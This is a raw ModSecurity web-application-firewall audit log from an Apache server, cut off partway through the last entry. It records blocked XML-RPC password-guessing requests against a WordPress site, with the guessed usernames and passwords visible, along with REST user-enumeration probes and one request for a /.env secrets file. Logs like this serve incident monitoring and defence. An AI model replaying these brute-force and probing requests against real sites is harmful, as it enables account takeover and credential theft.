--0d929b06-A-- [28/May/2025:20:33:39 +0700] aDcQs_nnEwDNUSjDseIv8wAAAIo 103.236.140.4 49368 103.236.140.4 8181 --0d929b06-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 496 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0d929b06-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel@netatwork.com --0d929b06-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d929b06-E-- --0d929b06-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439219625460 6108 (- - -) Stopwatch2: 1748439219625460 6108; combined=4458, p1=508, p2=3724, p3=0, p4=0, p5=128, sr=103, sw=98, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d929b06-Z-- --a69fa434-A-- [28/May/2025:20:36:25 +0700] aDcRWeszXCullgn3bbHDpQAAAAQ 103.236.140.4 49626 103.236.140.4 8181 --a69fa434-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --a69fa434-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelcsibrafaadhel --a69fa434-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a69fa434-E-- --a69fa434-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439385841263 6125 (- - -) Stopwatch2: 1748439385841263 6125; combined=4301, p1=519, p2=3605, p3=0, p4=0, p5=105, sr=90, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a69fa434-Z-- --b48f2d4c-A-- [28/May/2025:20:40:27 +0700] aDcSS-szXCullgn3bbHD0gAAAAc 103.236.140.4 49864 103.236.140.4 8181 --b48f2d4c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --b48f2d4c-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix_admin@ --b48f2d4c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b48f2d4c-E-- --b48f2d4c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439627867867 5724 (- - -) Stopwatch2: 1748439627867867 5724; combined=4010, p1=489, p2=3330, p3=0, p4=0, p5=110, sr=88, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b48f2d4c-Z-- --f2a9a650-A-- [28/May/2025:20:41:28 +0700] aDcSiOszXCullgn3bbHD6wAAAAU 103.236.140.4 49954 103.236.140.4 8181 --f2a9a650-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 491 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f2a9a650-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantixadmin123!@# --f2a9a650-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2a9a650-E-- --f2a9a650-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439688394219 5246 (- - -) Stopwatch2: 1748439688394219 5246; combined=4115, p1=456, p2=3489, p3=0, p4=0, p5=100, sr=84, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2a9a650-Z-- --679ca97a-A-- [28/May/2025:20:42:28 +0700] aDcSxBwBHP_x2VCWa06c0wAAANU 103.236.140.4 50072 103.236.140.4 8181 --679ca97a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.36.142.130 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.36.142.130 X-Forwarded-Proto: https Connection: close Content-Length: 490 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --679ca97a-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix_admin1995 --679ca97a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --679ca97a-E-- --679ca97a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.36.142.130 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439748575096 20222 (- - -) Stopwatch2: 1748439748575096 20222; combined=34618, p1=402, p2=3136, p3=0, p4=0, p5=15553, sr=81, sw=71, l=0, gc=15456 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --679ca97a-Z-- --5fb42e5f-A-- [28/May/2025:20:43:21 +0700] aDcS-Q3r-0gDryHAyD_gZwAAAEw 103.236.140.4 50152 103.236.140.4 8181 --5fb42e5f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5fb42e5f-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix*2020 --5fb42e5f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fb42e5f-E-- --5fb42e5f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748439801264175 5581 (- - -) Stopwatch2: 1748439801264175 5581; combined=4049, p1=451, p2=3416, p3=0, p4=0, p5=108, sr=86, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fb42e5f-Z-- --df2a6147-A-- [28/May/2025:20:50:53 +0700] aDcUveszXCullgn3bbHELQAAAAM 103.236.140.4 50772 103.236.140.4 8181 --df2a6147-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --df2a6147-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelHozes2021! --df2a6147-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df2a6147-E-- --df2a6147-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748440253369605 5728 (- - -) Stopwatch2: 1748440253369605 5728; combined=4308, p1=522, p2=3621, p3=0, p4=0, p5=98, sr=94, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df2a6147-Z-- --80d51020-A-- [28/May/2025:21:19:02 +0700] aDcbVvnnEwDNUSjDseIxHgAAAJc 103.236.140.4 52944 103.236.140.4 8181 --80d51020-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 198.186.130.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 198.186.130.214 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --80d51020-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80d51020-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748441942115543 2944 (- - -) Stopwatch2: 1748441942115543 2944; combined=1419, p1=472, p2=913, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80d51020-Z-- --0832392b-A-- [28/May/2025:21:59:07 +0700] aDckuxwBHP_x2VCWa06exAAAAM0 103.236.140.4 56076 103.236.140.4 8181 --0832392b-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 178.33.250.142 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 178.33.250.142 X-Forwarded-Proto: https Connection: close Content-Length: 492 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --0832392b-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelfaadhel!@#$%^&*() --0832392b-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0832392b-E-- --0832392b-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748444347582799 6839 (- - -) Stopwatch2: 1748444347582799 6839; combined=4911, p1=553, p2=4101, p3=37, p4=42, p5=115, sr=95, sw=63, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0832392b-Z-- --fccf280c-A-- [28/May/2025:22:00:44 +0700] aDclHBwBHP_x2VCWa06e0QAAAMg 103.236.140.4 56238 103.236.140.4 8181 --fccf280c-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 206.189.18.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 206.189.18.26 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --fccf280c-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix*2021 --fccf280c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fccf280c-E-- --fccf280c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 206.189.18.26 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748444444976156 5957 (- - -) Stopwatch2: 1748444444976156 5957; combined=4360, p1=476, p2=3719, p3=0, p4=0, p5=98, sr=81, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fccf280c-Z-- --4dd83557-A-- [28/May/2025:22:00:53 +0700] aDclJRwBHP_x2VCWa06e1gAAAMc 103.236.140.4 56250 103.236.140.4 8181 --4dd83557-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 162.241.61.200 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 162.241.61.200 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --4dd83557-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhel&faadhel& --4dd83557-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dd83557-E-- --4dd83557-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1748444453390826 5384 (- - -) Stopwatch2: 1748444453390826 5384; combined=4223, p1=463, p2=3557, p3=24, p4=26, p5=92, sr=119, sw=61, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dd83557-Z-- --d8931c1e-A-- [28/May/2025:22:01:24 +0700] aDclRBwBHP_x2VCWa06e4AAAANQ 103.236.140.4 56312 103.236.140.4 8181 --d8931c1e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.18.255.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.18.255.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d8931c1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8931c1e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748444484374265 2349 (- - -) Stopwatch2: 1748444484374265 2349; combined=1069, p1=365, p2=677, p3=0, p4=0, p5=26, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8931c1e-Z-- --742b3821-A-- [28/May/2025:22:02:10 +0700] aDclcvnnEwDNUSjDseIyXgAAAJc 103.236.140.4 56364 103.236.140.4 8181 --742b3821-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 206.189.18.26 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 206.189.18.26 X-Forwarded-Proto: https Connection: close Content-Length: 487 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --742b3821-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelFaAdHeL@2025 --742b3821-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --742b3821-E-- --742b3821-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 206.189.18.26 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748444530798919 5025 (- - -) Stopwatch2: 1748444530798919 5025; combined=3866, p1=452, p2=3244, p3=0, p4=0, p5=99, sr=85, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --742b3821-Z-- --e24a760e-A-- [28/May/2025:22:31:50 +0700] aDcsZuszXCullgn3bbHH_AAAABE 103.236.140.4 58618 103.236.140.4 8181 --e24a760e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.192.214.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.192.214.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e24a760e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e24a760e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748446310077752 3396 (- - -) Stopwatch2: 1748446310077752 3396; combined=1446, p1=503, p2=906, p3=0, p4=0, p5=37, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e24a760e-Z-- --5fab5431-A-- [28/May/2025:22:33:42 +0700] aDcs1vnnEwDNUSjDseIzEwAAAJA 103.236.140.4 58672 103.236.140.4 8181 --5fab5431-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 188.225.23.170 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 188.225.23.170 X-Forwarded-Proto: https Connection: close Content-Length: 480 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --5fab5431-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminantix30 --5fab5431-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5fab5431-E-- --5fab5431-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 188.225.23.170 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748446422474196 6359 (- - -) Stopwatch2: 1748446422474196 6359; combined=4506, p1=525, p2=3751, p3=0, p4=0, p5=134, sr=91, sw=96, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5fab5431-Z-- --d4e9c63f-A-- [28/May/2025:22:34:38 +0700] aDctDuszXCullgn3bbHIDQAAABA 103.236.140.4 58724 103.236.140.4 8181 --d4e9c63f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36 Accept-Charset: utf-8 --d4e9c63f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4e9c63f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748446478823385 732 (- - -) Stopwatch2: 1748446478823385 732; combined=311, p1=270, p2=0, p3=0, p4=0, p5=40, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4e9c63f-Z-- --86e10505-A-- [28/May/2025:22:37:35 +0700] aDctvxwBHP_x2VCWa06fuAAAAMs 103.236.140.4 58888 103.236.140.4 8181 --86e10505-B-- POST /xmlrpc.php HTTP/1.0 Host: 